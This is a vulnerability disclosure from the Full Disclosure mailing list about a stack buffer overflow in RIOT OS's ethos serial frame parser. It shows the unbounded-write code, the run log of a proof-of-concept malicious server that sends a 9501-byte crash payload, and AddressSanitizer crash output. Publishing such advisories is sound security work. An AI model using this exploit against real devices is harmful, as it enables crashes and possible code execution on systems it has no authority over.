Full Disclosure mailing list archives

A stack-based buffer overflow vulnerability exists in the RIOT OS ethos
utility due to missing bounds checking when processing incoming serial
frame data. The vulnerability occurs in the _handle_char() function, where
incoming frame bytes are appended to a fixed-size stack buffer
(serial->frame) without verifying that the current write index
(serial->framebytes) remains within bounds. An attacker capable of sending
crafted serial or TCP-framed input can cause serial->framebytes to exceed
the buffer size (MTU, 9000 bytes), resulting in a write past the end of the
stack buffer. This condition leads to memory corruption, application crash,
and potentially arbitrary code execution depending on compiler options and
runtime protections.


*Vulnerable Code:*
static void _handle_char(serial_t *serial, char c)
{
    serial->frame[serial->framebytes] = c;
    serial->framebytes++;
}

*Root Cause:*

* serial->frame is a fixed-size stack buffer (char frame[MTU])
* serial->framebytes is unbounded and attacker-controlled
* No validation against MTU before writing



*Proof of Concept:*


*listener:*# python3 payload.py

This exploit acts as a MALICIOUS SERVER.
Run ethos like: ./ethos tap0 tcp:127.0.0.1 20000
The exploit will send the payload when ethos connects.


[*] Starting malicious server on 0.0.0.0:20000
[*] Architecture: aarch64
[*] Exploitation mode: crash

[+] Server listening on 0.0.0.0:20000

[!] Waiting for ethos to connect...
[*] Run ethos like this:
  ./ethos tap0 tcp:127.0.0.1 20000

[+] ethos client connected from ('127.0.0.1', 37114)
[*] Generating crash payload...
[+] Crash payload ready: 9501 bytes
[*] Waiting 1 second before sending payload...
[*] Sending malicious payload (9501 bytes)...
[*] Sent 1024/9501 bytes...
[*] Sent 2048/9501 bytes...
[*] Sent 3072/9501 bytes...
[*] Sent 4096/9501 bytes...
[*] Sent 5120/9501 bytes...
[*] Sent 6144/9501 bytes...
[*] Sent 7168/9501 bytes...
[*] Sent 8192/9501 bytes...
[*] Sent 9216/9501 bytes...
[*] Sent 9501/9501 bytes...
[+] Payload sent successfully!
[!] ethos client should crash now (check for ASAN output)
[*] Received response:
b'~}"\x00\x00\x00\x00\x00\x00~~}"\x00\x00\x00\x00\x00\x00~'
[*] Connection from ('127.0.0.1', 37114) closed



*Connection:*
./ethos tap0 tcp:127.0.0.1 20000



*Output:*----> ethos: sending hello.
----> ethos: activating serial pass through.
ethos.c:186:5: runtime error: index 9000 out of bounds for type 'char[9000]'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ethos.c:186:5
=================================================================
==1375066==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbff8f804848 at pc 0xaaaae0b9fad0 bp 0xffffece78420 sp 0xffffece78418
WRITE of size 1 at 0xfbff8f804848 thread T0
    #0 0xaaaae0b9facc in _handle_char
/root/RIOT/dist/tools/ethos/ethos.c:186:39
    #1 0xaaaae0b9ed38 in _serial_handle_byte
/root/RIOT/dist/tools/ethos/ethos.c:216:17
    #2 0xaaaae0b9ed38 in main /root/RIOT/dist/tools/ethos/ethos.c:559:34
    #3 0xffff91162598 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xffff91162678 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xaaaae0ab67ec in _start (/root/RIOT/dist/tools/ethos/ethos+0x367ec)
(BuildId: 4734887eb4858e961729a4e74b8fbfbd73e74d82)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser Ron E (Jan 10)